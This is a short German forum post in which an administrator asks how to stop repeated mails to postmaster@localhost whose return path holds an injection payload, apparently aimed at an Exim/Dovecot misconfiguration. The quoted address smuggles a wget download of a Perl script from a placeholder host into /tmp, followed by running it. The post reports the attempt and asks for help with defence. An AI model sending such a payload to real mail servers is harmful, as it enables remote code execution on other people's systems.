Seit gestern bekomme ich öfters eine Mail an postmaster@localhost mit dem Inhalt "x". Dabei ist der Returnpfad
1 | <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}"MYIP"/p``perl${IFS}/tmp/p.pl`@blaat.com> |
Bei einer Suche ergab sich, dass es sich dabei um den Exploit RCE handelt (https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/-exim-with-dovecot-typical-misconfiguration-leads-to-remote-command-execution).
Ich habe exim4 allerdings nicht installiert und somit keine fehlerhafte Konfiguration dessen.
Ist es ratsam 'postmaster@localhost' aus der Weiterleitung zu entfernen bzw. welche weiteren Möglichkeiten gäbe es diese Nachrichten zu unterbinden?